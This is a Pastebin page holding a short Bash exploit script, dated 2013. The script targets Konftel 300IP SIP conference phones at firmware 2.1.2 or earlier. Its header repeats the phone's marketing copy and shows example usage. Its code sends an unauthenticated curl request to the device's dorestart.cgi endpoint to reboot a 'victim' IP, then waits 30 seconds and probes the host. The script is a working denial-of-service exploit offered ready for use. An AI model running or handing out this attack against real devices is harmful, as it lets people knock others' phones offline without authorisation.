Advertisement
hackerscommunity

Konftel 300IP SIP Phone <= 2.1.2 remote reboot exploit

Jul 11th, 2015
413
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.86 KB | None | 0 0
  1. #!/bin/bash
  2. # Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
  3. #
  4. # by Todor Donev / 03.2013 / Sofia,Bulgaria
  5. # email: todor dot donev at gmail com
  6. # type: hardware
  7. #
  8. # The Konftel 300IP is a flexible SIP-based conference phone,
  9. # perfect for companies that use IP voice services. Its clear,
  10. # natural sound comes from OmniSound HD, Konftel’s patented
  11. # wideband audio technology. The stylishly designed
  12. # Konftel 300IP is packed with intelligent features for more
  13. # efficient conference calls. Record and store meetings on a
  14. # SD memory card. Use the conference guide to call
  15. # pre-programmed groups with just a few simple pushes of a
  16. # button. Conveniently import and export contact details via
  17. # the Web interface. Create your own phone book with the
  18. # personal user profile feature. The Konftel 300IP is also
  19. # ideal for larger conferences since it can accommodate
  20. # expansion microphones, an external wireless headset and a
  21. # PA system. With the Konftel 300IP your company will have
  22. # a conference phone that combines all the benefits of IP
  23. # voice service with innovative new features.
  24. #
  25. # Example usage:
  26. # [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
  27. # Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
  28. # Rebooting 192.168.1.180..
  29. # Sleeping 30 secs, before rebooting
  30. # curl: (7) couldn't connect to host
  31. #
  32. # Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!
  33. #
  34. #  http://www.ethical-hacker.org/
  35. #  https://www.facebook.com/ethicalhackerorg
  36.  
  37. if [ $# != 1 ]; then
  38.         echo "usg: $0 <victim>"
  39.         exit;
  40. fi
  41. echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
  42. echo "Rebooting $1.."
  43. curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null
  44. echo "Sleeping 30 secs before rebooting"
  45. sleep 30
  46. curl $1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement